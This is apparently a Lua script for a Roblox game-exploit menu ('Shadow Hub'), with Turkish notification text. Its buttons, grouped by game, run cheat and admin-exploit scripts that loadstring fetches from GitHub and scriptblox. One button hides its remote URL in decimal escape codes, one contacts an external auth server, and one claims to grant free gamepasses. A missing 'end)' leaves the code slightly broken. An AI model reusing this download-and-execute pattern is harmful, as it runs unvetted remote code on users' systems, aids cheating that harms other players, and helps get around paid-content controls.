local DiscordLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/UI-Libs/main/discord%20lib.txt"))()
  
 local win = DiscordLib:Window("Shadow Hub V1.0") 
  
 local serv = win:Server("Shadow Hub V1.1","http://www.roblox.com/asset/?id=6031075938") 

 local btns = serv:Channel("Brookhaven 🏡RP") 
  
 btns:Button("Redz Hub", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Brookhaven-RP-REDz-HUB-6559"))() 
 DiscordLib:Notification("Bilgilendirme!", "Redz Hub Aktiflesdirildi", "Tamam!") 
 end) 
  
 btns:Seperator() 
  
 btns:Button("Icehub", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Ice-Hub-6414"))() 
 DiscordLib:Notification("Bilgilendirme!", "IceHub Aktiflesdirildi", "Tamam!") 
 end) 
  
 btns:Seperator() 
  
 btns:Button("Space Hub", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Space-Hub-7295"))() 
 DiscordLib:Notification("Bilgilendirme!", "Space Hub Aktiflesdirildi", "Tamam!") 
 end) 
  
 btns:Seperator() 
  
btns:Button("Free Gamepass", function()  loadstring(game:HttpGet("https://raw.githubusercontent.com/TheExploiterBoy/Wow/main/Brookhaven%20Premium%20V2"))()
 DiscordLib:Notification("Bilgilendirme!", "Free Gamepass Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

btns:Button("Troll Hub", function()  loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\65\99\117\114\97\88\48\52\57\47\111\98\102\117\115\99\97\116\101\100\83\99\114\105\112\116\115\47\109\97\105\110\47\75\105\108\108\71\117\105\34\41\41\40\41\10")() 
 DiscordLib:Notification("Bilgilendirme!", "Troll Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()
  
 local btns = serv:Channel("Murderers vs Sheriff") 
  
 btns:Button("Ranxware Hub", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/TRADING-Murderers-VS-Sheriffs-Duels-Ken-Script-7120"))() 
 DiscordLib:Notification("Bilgilendirme!", "Ranxware Hub Aktiflesdirildi", "Tamam!") 
 end) 
  
 btns:Seperator() 
  
 btns:Button("Ruby Hub", function()  loadstring(game:HttpGet("https://raw.githubusercontent.com/Deni210/murdersvssherrifsduels/main/rubyhub"))() 
 DiscordLib:Notification("Bilgilendirme!", "Ruby Hub Aktiflesdirildi", "Tamam!") 
 end) 
  
 btns:Seperator()  

btns:Button("Oasis Hub", function()  loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/bruvzz/oasishub/main/script"))()
 DiscordLib:Notification("Bilgilendirme!", "Oasis Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

btns:Button("Incurgence Hub", function()  loadstring(game:HttpGet('https://raw.githubusercontent.com/InsurgenceHub/IncurgenceHub.github.io/main/InsurgentHubOfficial'))()
 DiscordLib:Notification("Bilgilendirme!", "Incurgence Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

local btns = serv:Channel("Murder Mystery 2")


btns:Button("Nexus Hub", function()  loadstring(game:HttpGet('https://raw.githubusercontent.com/13B8B/NEXUS/main/loadstring'))()
 DiscordLib:Notification("Bilgilendirme!", "Nexus Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

btns:Button("Lunar Hub", function()  loadstring(game:HttpGet("https://raw.githubusercontent.com/vwSaraa/LunarHub/main/mm2"))()
 DiscordLib:Notification("Bilgilendirme!", "Lunar Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

btns:Button("Jaydens Hub", function() 
 loadstring(game:HttpGet('https://raw.githubusercontent.com/Jxys3rrV/jaydens-hub/main/script'))();
 DiscordLib:Notification("Bilgilendirme!", "Jaydens Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

btns:Button("Eclipse Hub", function() 
 local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https://api.eclipsehub.xyz/auth"c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
 DiscordLib:Notification("Bilgilendirme!", "Eclipse Hub Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

local btns = serv:Channel("Blade Ball")
btns:Button("Auto Parry", function() 
 getgenv().ScriptConfig = {
    -- Distance in stud before the automatic triggers,
    -- you may change even after you have ran the script if you desire!
    -- Just be sure to REMOVE the loadstring, or else you will face some... issues
	DistanceBeforeParry = 46,
}

loadstring(game:HttpGet("https://raw.githubusercontent.com/Sussy-Tech/Scripts/main/BladeBall.lua"))()
 DiscordLib:Notification("Bilgilendirme!", "Auto Parry Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()

local btns = serv:Channel("Pet Simulator")

btns:Button("Pet Sim X Script", function()  loadstring(game:HttpGet("https://raw.githubusercontent.com/DeezScripts/PsxStScripts69/main/scripts/sign/petchanger/unallhoverboards"))();
 DiscordLib:Notification("Bilgilendirme!", "Pet Sim X Script Aktiflesdirildi", "Tamam!") 
 end) 

btns:Seperator()
 
local btns = serv:Channel("Universal Admin S.") 


btns:Button("İnfinite Yield", function()  loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
 DiscordLib:Notification("Bilgilendirme!", "İnfinite Yield Aktiflesdirildi", "Tamam!") 
 end)

btns:Seperator()

btns:Button("BloodyBurns", function()  loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hex/main/Iv%20Admin%20v3.lua"))()
 DiscordLib:Notification("Bilgilendirme!", "BloodyBurns Aktiflesdirildi", "Tamam!") 
 end)

btns:Seperator()

btns:Button("Fates Admin", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-fates-admin-6785"))()
 DiscordLib:Notification("Bilgilendirme!", "Fates Admin Aktiflesdirildi", "Tamam!") 
 end)

btns:Seperator()

btns:Button("HomeBrew Admin", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-or-FE-Homebrew-Admin-3106"))()
 DiscordLib:Notification("Bilgilendirme!", "HomeBrew Aktiflesdirildi", "Tamam!") 
 
btns:Seperator()

btns:Button("Nameless Admin", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Nameless-Admin-6762"))()
 DiscordLib:Notification("Bilgilendirme!", "Nameless Admin Aktiflesdirildi", "Tamam!") 
 end)

btns:Seperator()

btns:Button("CMD-X Admin", function()  loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Unevirsal-Admin-6144"))()
 DiscordLib:Notification("Bilgilendirme!", "CMD-X Aktiflesdirildi", "Tamam!") 
 end)

btns:Seperator()